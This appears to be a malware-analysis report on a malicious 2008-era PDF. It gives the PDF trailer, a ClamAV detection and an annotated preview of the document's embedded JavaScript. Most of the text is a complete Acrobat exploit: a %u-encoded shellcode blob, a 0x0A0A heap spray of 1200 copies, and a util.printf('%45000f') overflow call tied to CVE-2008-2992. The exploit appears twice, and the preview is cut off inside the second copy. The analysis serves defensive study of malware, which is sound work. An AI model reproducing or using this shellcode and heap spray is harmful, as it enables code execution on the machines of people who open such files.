// Stage 2: 0x0A0A pad (was "%u0"+"A0A%u"+"0A0A" in the raw carve).
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob kept alive in one array
// (v0FN43s is an implicit global).
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: roughly 290-digit numeric literal, stored as a double (exact digits not preserved).
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 (the raw carve had "%45"+"000f"): the long format-specifier
// argument the heuristics section ties to CVE-2008-2992 (Acrobat util API, not Node's util).
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
combined_document_js_000.js
1e7c64171bd1c61d594f5b7fbaab1ce01f49e5b386fb9c5474895b8193fb142a
deobfuscated-js combined document JavaScript streams at offset 0x11 264939 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the combined script body below is unchanged; comment lines were added.
// combined_document_js_000.js concatenates every JavaScript stream in the document; this is the
// artifact ClamAV flags as Js.Exploit.Shellcode-18. The exploit script is repeated after this
// first copy (the preview is cut off inside the second copy).
// Entry point: calls a method on the document object (Acrobat's `this` is the Doc). Its body is
// not in this preview — presumably defined in another /JS stream; confirm against the full carve.
this.lhF0pCJES29x()
// Stage 1: %u-encoded blob decoded by unescape() (heuristics section: shellcode markers).
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
                         "%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
                         "%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
                         "%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
                         "%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
                         "%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
                         "%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
                         "%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
                         "%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
                         "%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
                         "%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
                         "%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
                         "%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
                         "%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
                         "%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
                         "%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
                         "%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
                         "%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
                         "%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
                         "%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
                         "%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
                         "%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
                         "%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
                         "%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
                         "%uD586%u659B%u7BD0%u1DFE");
						 
// Stage 2: split literal that normalizes to "%u0A0A%u0A0A" (see generic_stage_recovery_000.js).
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob kept alive in one array
// (v0FN43s is an implicit global).
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: roughly 290-digit numeric literal, stored as a double (exact digits not preserved).
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 ("%45"+"000f" -> "%45000f"): the long format-specifier
// argument the heuristics section ties to CVE-2008-2992 (Acrobat util API, not Node's util).
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
                         "%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
                         "%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
                         "%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
                         "%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
                         "%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
                         "%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
                         "%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
                         "%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
                         "%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
                         "%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
                         "%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
                         "%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
                         "%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
                         "%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
                         "%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
                         "%u38FE%u2F3E%u
... (truncated)